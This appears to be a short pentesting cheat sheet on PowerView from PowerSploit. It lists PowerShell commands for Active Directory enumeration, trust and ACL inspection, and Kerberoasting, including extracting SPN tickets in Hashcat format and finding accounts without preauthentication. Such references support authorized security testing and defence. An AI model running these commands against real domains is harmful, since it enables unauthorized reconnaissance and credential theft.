PowerSploit ¶

PowerSploit (11.5k ⭐, 2017 🪦) is the latest version of PowerTools and PowerUp which are dead too since 2014/2015.

PowerView is a module part of PowerSploit.

PS> Import-Module .\PowerView.ps1

PowerView — Domain Enumeration ¶

Get information on the domain:

PS> Get-DomainSID
PS> Get-DomainPolicy
PS> Get-DomainUser -Identity username
OS> Get-DomainGroup -Identity "XXX" | select memberof
PS> Get-DomainGroupMember -Identity "Domain Admins" -Recurse
PS> Get-DomainTrustMapping
PS> Test-AdminAccess -ComputerName TARGET_HOST
PS> Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName
PS> Get-DomainUser cn -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes # encryption scheme
PS> Get-DomainUser -Identity cn | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\xxx.csv -NoTypeInformation
PS> Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*XXX*'} | select samaccountname,useraccountcontrol
PS> Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
PS> Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol

📚 You can explicitly query a domain using -Domain example.com.

PowerView — Trust Relationships ¶

PS> Get-DomainTrust
PS> Get-DomainTrustMapping
PS> Get-DomainUser -Domain dev.example.com | select SamAccountName

PowerView — ACE-related commands ¶

PS> Find-InterestingDomainAcl
PS> $sid = Convert-NameToSid username
PS> $username = Convert-SidToName $sid
PS> Get-DomainObjectACL -Identity cn | ? {$_.SecurityIdentifier -eq $sid}
PS> Get-DomainObjectACL -ResolveGUIDs -Identity cn | ? {$_.SecurityIdentifier -eq $sid}
PS> Get-ObjectAcl "DC=example,DC=com" -ResolveGUIDs

PowerView — PS1 Alternatives ¶

There is a C# port called SharpView (0.9k ⭐, 2018 🪦).

PS> .\SharpView.exe Get-DomainUser -Identity username

There is a Python port called powerview.py (0.3k ⭐).